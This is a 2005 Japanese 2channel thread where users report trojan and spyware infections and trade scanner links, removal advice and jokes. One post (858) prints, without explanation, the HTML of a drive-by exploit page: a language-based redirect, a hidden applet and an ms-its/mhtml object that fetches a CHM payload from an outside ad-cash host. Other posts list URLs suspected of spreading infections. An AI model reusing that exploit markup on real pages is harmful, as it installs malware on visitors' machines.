805 ：名無しさん@お腹いっぱい。 ：2005/04/20(水) 23:05:26: >>804
FireFox1.03で開いたらFireFoxがあがったりさがったりする。
うざいからタスクバーでFireFox終了させた。
806 ：名無しさん＠お腹いっぱい。 ：2005/04/21(木) 01:05:09: 面白そうだから、その№19を踏んでみたが、オミトロン経由のせいかなんにも起きない。
807 ：名無しさん＠お腹いっぱい。 ：2005/04/25(月) 22:07:43: PCのアイコンが消えたり正常に動作しないのでトレンドマイクロでオンラインスキャンしたところTROJ_WINTRASH.Dに感染してしまったようです。
↓の症状も出てます。

＞＞そして、この不正プログラムは "WELCOME.EXE" を実行します。 "WELCOME.EXE" はコンピュータのCPU使用率を100パーセントにします。

　この不正プログラムはすべてのファイルおよびアイコンを隠すことを試みます。これによりWindowsが使用できなくなることがあります。

対応方法がOSの再インストールをする事みたいなのですが、ｃドライブを消したくないのでどうにかそれ以外で対処法が無いでしょうか？
OSはMEです。ご存知の方いましたら御教授お願いします。

トレンドマイクロのデータ-ベースですttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_WINTRASH.D
808 ：名無しさん＠お腹いっぱい。 ：2005/04/26(火) 01:27:48: 韓国の奴からトロイもらったんだけど・・・
809 ：808 ：2005/04/26(火) 01:30:12: 中国の奴からは侵入されるし・・・

ネット戦争でも始まったのか？
810 ：名無しさん＠お腹いっぱい。 ：2005/04/26(火) 10:17:19: ご教授ください。

OS:Windows Me　SecondEdition
IE:IE
最近どちらもパッチは当ててません。
トロイ対策としては、spybotを入れています。
昨日、トレンドマイクロオンラインスキャンにかけたところ、
トロイに感染してる模様です。
名前はTROJ_HKPROP.Aで、主にC\_RESTORE\TEMPの中のCPY
ファイルが感染していると出てきました。
が、データベースを探しても、Googleで検索しても、このトロイの詳細が
判りません。
spybotでスパイウェア等削除しIEのキャッシュをクリアしても何度も
出てきます。
これは一体なんでしょうか？
対処法はありますでしょうか？
よろしくお願いいたします。
811 ：名無しさん＠お腹いっぱい。 ：2005/04/26(火) 10:52:02: Windows MEにSecondEditionなんてあったか？
812 ：名無しさん＠お腹いっぱい。 ：2005/04/26(火) 11:05:39: >>810
検索しようね。
http://www.google.com/search?hl=ja&q=_RESTORE&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=
813 ：名無しさん＠お腹いっぱい。 ：2005/04/26(火) 13:10:29: >>811
慌ててもう一台のマシンと混同しました。すみません。

>>812
慌てて書き込んでしまいましたが、cabファイルやexeファイルにも
感染していて、手順の通りにしてもFIFOでも手動でも削除できません。
何度も再起動をかけましたが復元される模様です。

場所はc\_RESTORE\ARCHIVE\FS(数字).cab*A(数字).cpy*　と、
c\windows\inertinfo.exeです。

どうしたらよいのでしょうか。よろしくお願いいたします。
814 ：名無しさん＠お腹いっぱい。 ：2005/04/26(火) 13:29:03: >>813
検出名が間違ってないか？復元を無効にしたやり方は間違ってないか？
シマンテックのスキャンもやってみたら？
http://www.symantec.com/region/jp/securitycheck/index.html
あと、体験版のアンチウィルスをダウンロードしてインストールするという方法もある。
815 ：名無しさん＠お腹いっぱい。 ：2005/04/26(火) 13:29:21: WindowsUpdateもしないで皆目見当も付かぬトロイに取り憑かれて
２ちゃんで助けて～なんつってる馬鹿は
自分で置いた石につまずいて電車に轢かれて息絶えればいい
816 ：名無しさん＠お腹いっぱい。 ：2005/04/26(火) 13:38:44: んだな。
感染してからアンチウィルスとか導入しても、
無効化されたり定義ファイル取りに行くのを阻止されたりすることがあるから、
ほんとは予防が肝心なんだよな。
817 ：名無しさん＠お腹いっぱい。 ：2005/04/26(火) 13:49:16: 名前がTROJ_HKPROP.Aで本当に合ってる？
818 ：名無しさん＠お腹いっぱい。 ：2005/04/26(火) 16:53:43: >>815
>>816
俺の事だorz
もうどうしたらいいか分からん…
819 ：名無しさん＠お腹いっぱい。 ：2005/04/26(火) 17:32:20: 810=813です。

>>814
ありがとうございます。
試してみます。

>>817
トレンドマイクロ・オンラインスキャンではその名前が出てきました。
間違いないです。

仕方ないので検出されたファイルをまるごと全削除してみようと思います。
（その上でシステムに影響が出るようなら再インストールします…）
ありがとうございました。
820 ：名無しさん＠お腹いっぱい。 ：2005/04/27(水) 17:32:14: a-squaredで以下のように検知されたのですが、

gifan080.exe →　　Backdoor.Win32.Sandrator.c

以下のリンク2個とも　同じ結果でした。

ttp://www.hornet-works.com/
ttp://bar43.hp.infoseek.co.jp/lw/3/gifan080.zip

たのスキャンソフト使ってる方、どんな結果になるか
情報お願いします。
821 ：名無しさん＠お腹いっぱい。 ：2005/04/27(水) 19:01:00: ・eScan
　http://www.mwti.net/antivirus/mwav.asp
・ウイルスバスターOn-Line Scan
　http://www.trendmicro.co.jp/hcall/index.asp
・Symantec Security Check
　http://security2.norton.com/ssc/home.asp?j=1&langid=jp&venid=sym>
・McAfee.com ウイルススキャンオンライン
　http://www.sourcenext.com/mcafee/products/vso/>
・BitDefender Scan OnLine
　http://www.bitdefender.com/scan/Msie/index.php>
・Command On Demand
　http://www.commandondemand.com/eval/index.cfm>
・DrWeb
　http://www.dials.ru/english/www_av/home.htm>
・Panda Active scan
　http://www.pandasoftware.es/activescan/de/default.asp?IdVendor=1&IdLang=3&I>
・Free online Trojan Scanner
　http://www.trojanscan.com/
822 ：名無しさん＠お腹いっぱい。 ：2005/04/27(水) 23:32:42: >>820
Kaspersky、BitDefender、Ewidoの最新定義で反応なし
誤検出くさいですね
823 ：名無しさん＠お腹いっぱい。 ：2005/04/27(水) 23:36:34: >>822
レスサンクス。
824 ：名無しさん＠お腹いっぱい。 ：2005/05/02(月) 22:07:31: >>822
違うファイルでも発見されたけど・・・Backdoor.Win32.Sandrator.c
825 ：名無しさん＠お腹いっぱい。 ：2005/05/02(月) 22:41:36: >>824
誤検知　っぽいね
826 ：名無しさん＠お腹いっぱい。 ：2005/05/02(月) 23:00:07: セキュリティに気をつけた上で対策ソフトを入れていると検出されるものは99%誤検出と言ってもいい。
P2Pやアングラ巡りで不審なものをよく落としてくる人にはこういう判断がしづらいよね。
827 ：名無しさん＠お腹いっぱい。 ：2005/05/02(月) 23:30:09: ToRoIBusterっていったい何者なのかなぁ・・・。
828 ：名無しさん＠お腹いっぱい。 ：2005/05/03(火) 19:24:28: Trojan. StartPageってのに感染してたよ(;´Д`)
tempの中にあったse.dllってのが感染してたみたい。
about:blank でsearch forというページにスタートアップ時のHPを固定しやがる
とりあえずトロイは脳豚で消したがスパイウェアが消えねぇー
829 ：名無しさん＠お腹いっぱい。 ：2005/05/04(水) 03:05:42: StartPageってハゲ始めてますよって言われてるみたいだなｗ
830 ：名無しさん＠お腹いっぱい。 ：2005/05/04(水) 23:30:09: ファイル整理中に誤って変なファイルダブルクリックしたらトロイだった…orz
再起動したらバッファオーバーフローしたみたいな画面が大量に出て、
更にゴキブリが出てきたので、速攻Safeモードにして手動でそのファイルと
関連レジストリ消してなんとかなった。
これって有名なやつなんでしょうか？
831 ：名無しさん＠お腹いっぱい。 ：2005/05/04(水) 23:35:19: そんなトロイがあるか
832 ：名無しさん＠お腹いっぱい。 ：2005/05/04(水) 23:42:25: >>831
端折りすぎた('A`)
間違って変なファイルをダブルクリック＞何かインストールされた＞再起動したら小さいウインドウが大量に出て、
「バッファオーバーフロー～」とか書かれてた＞更に画面上にゴキブリが表示されて動きまくり

こういう状態になりますた。
833 ：名無しさん＠お腹いっぱい。 ：2005/05/04(水) 23:44:45: >>767
Trojan.VBS.IFrameをとりあえず確認。
834 ：833 ：2005/05/05(木) 00:42:44: あとはAdware.FunWeb.dだけでした。
835 ：名無しさん＠お腹いっぱい。 ：2005/05/05(木) 02:26:36: >>832
トロイじゃなくてウイルスだ
836 ：　：2005/05/05(木) 15:45:32: 912 名無しさん＠お腹いっぱい。 2005/05/01(日) 14:25:21
【使用OS】 XP home

【WindowsUpdateしてるか】しています

【AntiVirusは何を使っているか】使ってません

【別のオンラインスキャンしたならその結果は】　トレンドマイクロのオンラインスキャンで発見できず

【症状を具体的に、分かる限りすべて書く】　
起動時に、窓が物凄い勢いで開きまくり、ゴキブリの画像が縦横無人に走っていきました
すぐその場で再起動かけましたが、マイドキュメント内のファイルが吹っ飛び、かわりに(･ё･)00001.jpgなどの
ファイルが作られていました。

【何をしたらそんなことになったのか】　とても人には言えないようなEXEファイルを開いてしまいました
EXEファイル自体はオンラインスキャンに反応もせず、安心してクリックしたところ、明らかにウィルス仕込まれた
ような挙動をしたので、すぐにその場でオンラインスキャンしたんですが何も検出されませんでした。
そして今朝再起動したところ、上のような症状が出た次第です。

【これまでにとった措置】　再起動してトレンドマイクロオンラインスキャンにかけています

つづき↓
837 ：　：2005/05/05(木) 15:46:14: 951 名無しさん＠お腹いっぱい。 2005/05/02(月) 08:24:44
>>912
これと違うか？

ダウンロードありがとうございますｍ(_ _)ｍ。

このソフトは、イタズラが目的のソフトです。
イタズラ以外に使い道がありません。
デスクトップにゴキブリやハエが出現したり、勝手にディスクをフォーマット(嘘ですが）したりします。
ハエやゴキブリは出現している間も、Windows通常の操作ができます。
出現時間や、出現するキャラクターの設定もできます。
ゴキブリやハエが嫌いな人は使用しないで下さい。(＾_＾;)
また、ジョークの分からない人、及び、心臓の弱い人に使用するのもやめてくださいｍ(_ _)ｍ

952 名無しさん＠お腹いっぱい。 sage 2005/05/02(月) 08:30:06
>>951
そのソフトを元に、誰かが悪質に改竄したものじゃないか？
データが書き換えられてるようだから。ジョークの域を超えている。
元ソフトはVectorでダウソできる。
838 ：名無しさん＠お腹いっぱい。 ：2005/05/06(金) 15:07:36: a2いつから日本語化されてたの？
839 ：名無しさん＠お腹いっぱい。 ：2005/05/07(土) 17:57:33: OS XPでノートン2005を導入して一ヶ月くらいたったんですが
　
セキュリティ警告
ルールStrikeトロイの木馬のディフォルト切断のセキュリティ警告を製作しました。

というメッセージが止まらなくなってしまいました、ウイルスに感染しているのでしょうか？
840 ：名無しさん＠お腹いっぱい。 ：2005/05/08(日) 01:04:57: エールStrike
841 ：名無しさん＠お腹いっぱい。 ：2005/05/10(火) 19:01:58: 私も＞832と同じ症状になりました。
今は別PCから書き込んでますが、セーフモードでの起動もできなくなって困っております。

exeファイルをクリックしたときにavast!が反応して
Win32:Torjan-gen{UPX!}とか言ってましたが･････
842 ：名無しさん＠お腹いっぱい。 ：2005/05/12(木) 01:28:05: Trojan
843 ：名無しさん＠お腹いっぱい ：2005/05/12(木) 09:15:05: >>837
私もハエ・ゴキ型ウイルス攻撃喰らいました。
攻撃直後にマイドキュないのデータ全て消失＞＿＜
あるソフトのパッチファイルに偽装していました。
844 ：名無しさん＠お腹いっぱい。 ：2005/05/12(木) 11:28:57: >>843
トロイでもウィルスでもない不正プログラムだろう。
拾いに行って自分で実行しなければ被害にあわないし、
NT系なら管理者権限でログオンしてなければ実行しても被害にあわないはず。
845 ：名無しさん＠お腹いっぱい。 ：2005/05/12(木) 16:49:28: TROJ_AGENT.ABSというトロイが定期的にリアルタイムでウイルスバスターに
検出されて隔離されます。これはどうなるんですか？
846 ：名無しさん＠お腹いっぱい。 ：2005/05/12(木) 21:03:50: 漏れも>828ｻｿと同じ状態になっちゃったわなー
これ新種のトロイなんじゃないのかヽ(｀Å´)ﾉ
847 ：名無しさん＠お腹いっぱい。 ：2005/05/12(木) 21:17:06: 感染報告スレかここは。
848 ：名無しさん＠お腹いっぱい。 ：2005/05/13(金) 18:46:19: 予防してないのが悪いんだよね、結局

という俺はトロイに感染してＨＤＤフォーマットしたはいいが、
ＯＳをインストールできない
（古いマシンでＦＤＤからじゃないとブートできないんだが、
セカンドマシンであるこれのＦＤＤが壊れててブートディスク作れねぇ）
から、新しいパソコンを購入する羽目になったわけだがな

ってか、トロイ目的で一番いいソフトってどれなんかなぁ
ewidoって常駐保護してる？
849 ：名無しさん＠お腹いっぱい。 ：2005/05/13(金) 20:12:11: >>848
FDDを買ってくれば良いじゃん

ewidoの有料版の方は常駐しますよ
850 ：848 ：2005/05/14(土) 00:45:19: >>849
いや、そうなんだけどどうせ買うなら新しいのと思って
古かったからついでに

ってか、ewido起動したらさ
「リアルタイムプロテクション有効」とか出てない？
やっぱ常駐保護じゃないのかな、それとも期日制限あるのか・・・

どっちにしろ、すり抜けたトロイに感染したわけだけどね・・・
851 ：　：2005/05/14(土) 04:15:41: >>846
search forに変わるのはCoolWebSearchじゃなかったっけ？>Spywawe
852 ：名無しさん＠お腹いっぱい。 ：2005/05/14(土) 22:48:33: 私も窓が無限に開いてゴキブリやハエが画面上に現れるウイルスを踏んでしまいました。
セーフモードで本体と関連レジストリを消せば何とかなるようですが、
レジストリで何を消せばいいのかわかりません。
どなたか教えてください。
853 ：名無しさん＠お腹いっぱい。 ：2005/05/15(日) 07:45:41: あーーー畜生！！！
「Troian.ByteVerify」に感染しちまったよ・・。

くたばれ！このオレ！！！
854 ：名無しさん＠お腹いっぱい ：2005/05/15(日) 17:50:30: ＞＞852
これってデスクトップの憂鬱って言うジョークソフトを改造して作った悪質な
削除ファイルみたいだね
855 ：853 ：2005/05/16(月) 01:14:24: http://www.symantec.com/region/jp/avcenter/venc/data/trojan.byteverify.html

上記のサイトを参考に対処してみたんだけど、
PCをセーフモードの状態でスキャンを実行という所で
セーフモードにしてもノートンを起動できなかったんだよね・・。

それで通常モードに戻してそれから起動してノートンのウイルス情報を更新してスキャン実行したら
削除できたんだけど、これで良かったのかな？

その後ノートンには［システムの状態：問題ありません］と表示されてるので
完全に駆除できたと判断して良い？
856 ：名無しさん＠お腹いっぱい。 ：2005/05/16(月) 21:20:33: >>853
お前さん、FFDQ板の奴か？
857 ：名無しさん＠お腹いっぱい。 ：2005/05/16(月) 21:39:01: search for関連は怪しいプロセスが
winに常駐しちまってる。どこかに実行ファイルがあるはず。

俺はCAのオンラインスキャンで検査して手動で削除して復帰したぞ。
知り合いに頼まれたからだが、えらく手間がかかった。

というか、その時PCに入っていたノートンせんせじゃ発見、削除できず。

あとタスクマネージャーで動いている怪しいプロセスをググッてウイルスだと確信してから
消した。
セーフモードのプロンプトでしか消せない奴もあった。
858 ：名無しさん＠お腹いっぱい。 ：2005/05/16(月) 22:28:23: <script language="JavaScript">
var lang = navigator.systemLanguage;
if (lang == "ru") document.location = "http://awmcash.biz/adverts/nafig.html";
if (lang == "cn") document.location = "http://awmcash.biz/adverts/nafig.html";
if (lang == "zh") document.location = "http://awmcash.biz/adverts/nafig.html";
</script>
<html>
<head>
<title></title>
</head>
<body>
<applet CODE="BlackBox.class" width=1 height=1></APPLET>
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/x-scriptlet"></object>
</body>
</html>
859 ：名無しさん＠お腹いっぱい。 ：2005/05/16(月) 22:28:59: >>858
おい
860 ：名無しさん＠お腹いっぱい。 ：2005/05/18(水) 19:32:34: うわあ感染したあ
861 ：名無しさん＠お腹いっぱい。 ：2005/05/20(金) 04:27:14: Backdoor.Jupdateというのに感染してしまいました
アンチウイルスはavastを使っているんですがavastでは削除できず
オンラインスキャンをしてみたら感染していました
どうかお助けをお願いします
862 ：名無しさん＠お腹いっぱい。 ：2005/05/20(金) 04:40:21: リークテストの話でもしようぜ
863 ：名無しさん＠お腹いっぱい。 ：2005/05/20(金) 18:42:50: インターネットしてたら
マカフィーが、トロイがどうたらっていうのが出ました
今マカフィーのウイルススキャンしてるんですけど
感染ファイルが出てきたらどうすれば良いでしょうか
ＯＳはＸＰです
864 ：名無しさん＠お腹いっぱい。 ：2005/05/20(金) 18:44:09: 1 名前：匿名 2005-05-20 15:30 評価：　　　　　
http://www1.ezbbs.net/14/sion158/
http://www.geocities.jp/hellworld_1/web.html

http://myhome.hananet.net/~crazyghost/goto.htm
http://i1i9.net/pp/?kwc
http://arvan.nobody.jp/online/
http://omanko45.tvheaven.com/

多分この中のどれかだと思います
865 ：名無しさん＠お腹いっぱい。 ：2005/05/20(金) 18:57:27: 今検索終了したんですけど
感染ファイルが見つかりませんでした
マカフィーのウイルススキャンではひっかからないのでしょうか
866 ：名無しさん＠お腹いっぱい。 ：2005/05/23(月) 22:53:10: >>861
ノートンで対策済み
なぜなら実際にそれ俺のパソに侵入しようとしてた
867 ：名無しさん＠お腹いっぱい。 ：2005/05/24(火) 17:57:20: ノートン先生が、
Blood hound Expoliteに感染していると言われるので、
検索結果に従い、セーフモードでスキャン中なのですが、
これで対策はあっているでしょうか？
セーフモードから通常に戻す方法も回答いただけるとありがたいです。
よろしくお願いします。
868 ：名無しさん＠お腹いっぱい。 ：2005/05/25(水) 04:44:35: > セーフモードから通常に戻す方法

普通に再起動すれば良い
869 ：名無しさん＠お腹いっぱい。 ：2005/05/25(水) 13:44:15: いつも思うんだが、こういうことを聞く奴は、自分と同じウイルスに感染した
かつ自分の疑問に適切に答えられる程度のスキルか知識を持った人が
このスレに偶然いると思っているのか？
表示されたor検索で出てきた方法で対処するしかなかろーに
870 ：名無しさん＠お腹いっぱい。 ：2005/05/25(水) 16:16:06: >>869
暇潰しがてらに俺様が自作自演してるだけだから気にするな禿げ
871 ：名無しさん＠お腹いっぱい。 ：2005/05/26(木) 17:44:20: >>870
(　´_ゝ`)σ)Д`)
872 ：名無しさん＠お腹いっぱい。 ：2005/05/31(火) 01:44:12: syatem32内にmousehs.exeを組み込まれ、Backdoor.Small.fbが検出されました。
しかし、このバックドア、隔離も削除もできないんです・・・。mousehs.exeも同様に削除できない。
どうすればいいんでしょうか？
873 ：名無しさん＠お腹いっぱい。 ：2005/05/31(火) 01:47:00: そういう質問を投げかけられて、あなたらなんて答えますか？
874 ：名無しさん＠お腹いっぱい。 ：2005/05/31(火) 04:07:02: たわば
875 ：名無しさん＠お腹いっぱい。 ：2005/05/31(火) 04:31:23: >>872
EXEはあなたのパソコンの中を走りまわっています、
ものすごい勢いで走ります、
最初から走ります、めっちゃ走ります。
RUNNING、そうです、イッツ　ランニング　パーフェクトリィ　なのです。
お解りですか？
876 ：名無しさん＠お腹いっぱい。 ：2005/05/31(火) 21:58:06: 起動オプションでセーフモードでDOS窓から消せ。
877 ：裏タモリ ◆FO2HkZCJ9E ：2005/06/01(水) 01:23:38: トロイの木馬に感染してしまった様です。
最近、頭の中から知らない人の声が聞こえるんです。
誰かに操作されている。
このまま行くと私はどうなってしまうのでしょうか。
削除しようと思うのですが、怖いです。
878 ：名無しさん＠お腹いっぱい。 ：2005/06/01(水) 08:32:24: Nortonがトロイの木馬を検出しました。退治するにはどうすればよいのでしょう？
879 ：名無しさん＠お腹いっぱい。 ：2005/06/01(水) 08:42:18: 量子魚雷を撃て
880 ：名無しさん＠お腹いっぱい。 ：2005/06/01(水) 14:44:02: TROJ_DYFUCA.CR
TROJ_ISTBAR.GEN
TRPJ_DLDR.DLL
オンラインスキャンで調べたらこの三つ感染してたんだがどうやって消せばいいの？
ウイルスバスター購入せんとだめ？
881 ：名無しさん＠お腹いっぱい。 ：2005/06/01(水) 14:54:13: Swat Itの使い方どっかにない？
英語で全然わからへん・・・
882 ：名無しさん＠お腹いっぱい。 ：2005/06/01(水) 14:56:21: >>878 >>880
検出した製品のベンダーのサイトで調べろ。
名前が分かっているなら、その名前でぐぐれ。
883 ：名無しさん＠お腹いっぱい。 ：2005/06/01(水) 16:15:20: ぐぐってもわからん。
レジストリエディタとかなんてチンプンカンプンやし
884 ：名無しさん＠お腹いっぱい。 ：2005/06/01(水) 16:24:38: 【ドモコ】 winnyキンタマウイルス感染【ﾃﾗﾔﾊﾞｽ】　
http://news19.2ch.net/test/read.cgi/news/1117609611/
ＮＴＴドコモ東海が静岡、愛知、岐阜県内に設置した携帯電話基地局
約８００カ所の所在地や入局方法などをまとめた「社外秘」扱いの資料が、
ネット上に流出していることが分かった。事態を重視した同社はすべての
鍵を付け替えるなど緊急対策を実施した。ファイル交換ソフト「ウィニー」の
ウイルス感染が原因とみられる。
885 ：名無しさん＠お腹いっぱい。 ：2005/06/01(水) 20:07:33: >>883
じゃあ製品を買えよ
886 ：名無しさん＠お腹いっぱい。 ：2005/06/02(木) 10:38:46: >>881
Swat Itの公式ページ
ttp://swatit.org/
をYahoo↓とかのWeb翻訳サイトで訳せばいい
ttp://honyaku.yahoo.co.jp/url
887 ：テイト ：2005/06/03(金) 23:36:07: 748 ：テイト：2005/06/03(金) 23:33:17
２ちゃんから別のサイトにジャンプしたら
（新シャア板　さすが○○は××のお家芸だなで1000を目指すスレ
の５３番のレスです・・）

トロイの木馬に感染した旨のメッセージが出ました
マカフィーセキュリテイースイーツを
使っていたので削除し、ウイルススキャンしても
異常はありませんでした

その後ｇｏｏなどで、オンラインウイルスチエックがあると聞き
ウイルスバスターとｓｙｍａｔｅｃｋの２社のを利用したところ

ウイルスバスターではＨＴＭＬ＿ＲＥＤＩＲ．Ａに感染
ｓｙｍａｔｅｃｋではＵｎｉｘ．Ｐｅｎｇｕｉｎに感染
との診断が・・・

後者は２ちゃん利用の誤検出かもしれませんが
前者のほうが気になります
どなたか削除の方法や対処法などご存知の方教えてください
888 ：名無しさん＠お腹いっぱい。 ：2005/06/03(金) 23:48:59: >>887
最初にやることは検索じゃないかな。

HTML_REDIR．Aで検索
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_REDIR.A
889 ：名無しさん＠お腹いっぱい。 ：2005/06/07(火) 05:38:28: 　　　 , - ' ﾞ　　　｀` ‐ 、_,,,,,
　　　,r'　　　　　　　　　／＝ミ
　　/　　　　　　　　　　　彡ll',''´
.　/ 　　　　　　　　　　　彡lll
　!-- .､　　　 ,､､､､,,,　　彡lﾉ
　l,,,,,__　/　　　___　　　 'r''ﾞヽ
.　|`ﾞ'' ./　　　`'ﾞ'''"　　　 .〉,l |
　|. 　 ,'　　　　　　　　　　//
.　',.　,'　　　　　　　　 ,　r'
.　ﾞ,　ﾞ'ｰ　‐`　　　　　l　 |
　　ﾞ､''ﾞ ,,､二''‐　　　ﾉ　 l、
''''''''7'ヽ　 '''　　　　／　　/`〉｀ﾞT''''''''''
　　l　　` ､,,,,､- ' "　　　 / /.| 　|
.　 |　 |　 .l i　　　　　　 / ./ | 　|
　 |　 |　　| l　　　　　 / ./　.|　 |
.　|　 |　　 | l　　　　/　/　 |　 |
　|　 |　　　| ',　　　/　/　　l 　.l
【ゴールデンレス】
このレスを見た人はコピペでもいいので
10分以内に3つのスレへ貼り付けてください。
そうすれば１４日後好きな人から告白されるわ宝くじは当たるわ
出世しまくるわ体の悪い所全部治るわでえらい事です
890 ：名無しさん＠お腹いっぱい。 ：2005/06/07(火) 08:58:04: http://www.inohost.com/
このWarezサイトの解析お願いします。
どのリンクを辿っても
ysbinstall_1002755_3.exeとかpatch_1002755_3.exeのような
いかにも怪しいファイルしか落とせません。
一体何のために存在するサイトなのでしょうか？
891 ：名無しさん＠お腹いっぱい。 ：2005/06/07(火) 12:31:40: >>890
欲に目が眩んで基本的な警戒すら怠る人を懲らしめるためのサイトではないかと（ｗ

それからその「怪しいファイル」はトロイだから気を付けてね
ちなみにノートンやAVGだと引っ掛からなかったりもするけど
892 ：名無しさん＠お腹いっぱい。 ：2005/06/22(水) 03:37:07: test
893 ：名無しさん＠お腹いっぱい。 ：2005/06/27(月) 16:14:53: トロイの木馬にやられたＰＣを再インストールして買ったときの状態に
戻したんですがそれでウイルスはなくなるんですか？
894 ：名無しさん＠お腹いっぱい。 ：2005/06/27(月) 17:12:37: >>893
なくなるとは限らない。システムドライブ(C):だけが感染してたならいいが、
他のドライブにも移ってる恐れはあるので、復旧後にスキャンした方がいい
895 ：名無しさん＠お腹いっぱい。 ：2005/07/04(月) 16:28:42: ※トロイ注意※

音声ファイル変換ソフト「Vocal Cancel」が、「トロイの木馬（TROJ_HIROFU.A）」であると確認された。
ttp://www.vector.co.jp/info/050704_vocal_cancel.html

※現時点で対応しているアンチウイルス製品
ウイルスバスター（最速で対応）
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_HIROFU.A&VSect=T
ノートン（手動アップデートでやっと対応）
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-trojan.hirofu.html

・NOD32は未対応。
896 ：名無しさん＠お腹いっぱい。 ：2005/07/05(火) 12:06:06: SwatIt使ってる人少ないのかなぁ
更新頻度は低いけど数少ないフリーツールだのにだのにだー
897 ：名無しさん＠お腹いっぱい。 ：2005/07/05(火) 12:26:32: >>896
無料版は月イチでの更新みたいですね
898 ：896 ：2005/07/05(火) 12:46:27: >>897
俺は月一で充分だと思うけど。
スキャン自体、月数回だし。
spybotやad-awareみたいな感じの気休めツールとして捉えてるんで。
よしよし怪しいのは入ってないなと確認。
本気で頼るなら常駐ツールでないとね。
899 ：名無しさん＠お腹いっぱい。 ：2005/07/06(水) 23:43:12: 変な顔の絵が表示されてかかるのってトロイだっけ？
900 ：名無しさん＠お腹いっぱい。 ：2005/07/07(木) 13:18:22: >>895
音声ファイル変換ソフト「Vocal Cancel」が、「トロイの木馬（TROJ_HIROFU.A）」であると確認された。
ttp://www.vector.co.jp/info/050704_vocal_cancel.html

※7月7日時点で対応しているアンチウイルス製品
ウイルスバスター（最速で対応）
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_HIROFU.A&VSect=T
ノートン（自動アップデートでも対応）
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-trojan.hirofu.html
マカフィー
ttp://vil.nai.com/vil/content/v_134732.htm

【・NOD32は未対応】

補足情報）
第二の価格コム事件とも言える「ozmall」のサーバがクラックされた事件の場合では、
現時点で４製品が問題のウイルスを検出できてます。
ttp://www.ozmall.co.jp/050530/virus.html#soft
　　　　　　　　　　　　　　　　　　　　　　　検出　駆除
マカフィー（Managed VirusScan）　　　　可　　　可
アンラボ（V3ウイルスブロック2005）　　可　　　可
F-Secureアンチウィルス.　　　　　　　　可　　　可
Kaspersky　　　　　　　　　　　　　　　　　可　　　可
NOD32　　　　　　　　　　　　　　　　　　　不能　不能
901 ：名無しさん＠お腹いっぱい。 ：2005/07/08(金) 12:15:02: 馬
902 ：名無しさん＠お腹いっぱい。 ：2005/07/08(金) 13:17:45: 羊
903 ：名無しさん＠お腹いっぱい。 ：2005/07/08(金) 20:19:18: ここのスレ開くとノートンが
コンピューター上にウイルスが検出されました
Bloodhound.Exploit.6
って出るんですが
これはどういう意味でしょうか？
自分のコンピューターがウイルスに感染してるんですか？
マジレスお願いします。
904 ：　：2005/07/08(金) 21:02:59: >>903
コンピューター上というかこのスレのファイルにじゃないかな。
だとすればノートントラップの可能性。
905 ：名無しさん＠お腹いっぱい。 ：2005/07/08(金) 21:22:59: >>904
感染してないってことですよね？
レスありがとうございました。
906 ：名無しさん＠お腹いっぱい。 ：2005/07/09(土) 21:36:38: ●みずほダイレクトを狙ったスパイウェア、郵貯や東京三菱などもターゲット●
ttp://internet.watch.impress.co.jp/cda/news/2005/07/08/8345.html

（7月9日時点）
ウイルスバスター
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TSPY_BANCOS.ANM
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=SPYW_INVKEY12.A

ノートン
ttp://www.symantec.com/region/jp/avcenter/venc/data/spyware.invisiblekey.html

【・NOD32は未対応】
907 ：帆船8●1 ：2005/07/09(土) 22:43:14: 　　ﾉﾉﾉﾉ
　　( ﾟ∋ﾟ)
￣∪|￣∪|￣| ⌒ヽ
￣|￣￣|￣￣|=ﾟωﾟ)　
￣￣|￣￣|￣|⌒丶　　
￣|￣￣|￣￣|从ｗﾉ　　　噂の「Vocal Cancel」ですが、
￣￣|￣￣|￣|Д｀ﾉ　＜　　閉鎖されたページがInternet Archiveで保存されており、
￣|￣￣|￣￣|　/　　　　　　そこからソフトが落とせましたので（zipファイルの解凍に修復が必要でした）
￣￣|￣￣|￣|・∀・）　　　　　二つのフリーのトロイ対策ソフトで調査しました。
＾^＾^＾^＾^＾^＾^＾^＾^＾^＾

結果は、

「ewido」（Ver3.5、データベース#1323）では「TROJ_HIROFU」として検出されました。
「a-squared」（Ver1.6、総定義数156308）では、マルウェア・トロイとして検出されませんでした。
908 ：名無しさん＠お腹いっぱい。 ：2005/07/10(日) 03:33:19: マカフィーでスキャンかけたら一つウイルスを発見しました
トロイの木馬「Ｄｏｗｎｌｏａｄｅｒ-QR」というものなのですが、これはいったい・・・
909 ：帆船8●1 ：2005/07/10(日) 20:32:24: >>908
　　ﾉﾉﾉﾉ
　　( ﾟ∋ﾟ)
￣∪|￣∪|￣| ⌒ヽ
￣|￣￣|￣￣|=ﾟωﾟ)　
￣￣|￣￣|￣|⌒丶
￣|￣￣|￣￣|从ｗﾉ　悪い虫は早めに駆除ですよ　
￣￣|￣￣|￣|Д｀ﾉつttp://www.nai.com/japan/security/virD2004.asp?v=Downloader-QR#removal
￣|￣￣|￣￣|　/
￣￣|￣￣|￣|・∀・）
＾^＾^＾^＾^＾^＾^＾^＾^＾^＾
910 ：名無しさん＠お腹いっぱい。 ：2005/07/11(月) 01:55:41: >907
VirusTotalでためしてくれ～
ttp://www.virustotal.com/flash/index_en.html
911 ：名無しさん＠お腹いっぱい。 ：2005/07/11(月) 04:20:54: >>910
907じゃないけど結果は以前試した時と同じだった
反応するのはSymantecとFortinetだけ
912 ：名無しさん＠お腹いっぱい。 ：2005/07/11(月) 16:41:04: インシデント状態ロケーション
Adware:Adware/Ucmore 駆除不能 Windows レジストリ
Virus:Trj/Downloader.ABR 駆除オペレーティングシステム
Spyware:Spyware/FastSearchWeb 駆除不能 Windows レジストリ
Virus:Trj/Downloader.AEE 駆除オペレーティングシステム
Adware:Adware/Xrenoder 駆除不能 Windows レジストリ
Virus:Trj/Small.GV 駆除オペレーティングシステム Adware:Adware/Pacimedia 駆除不能 Windows レジストリ

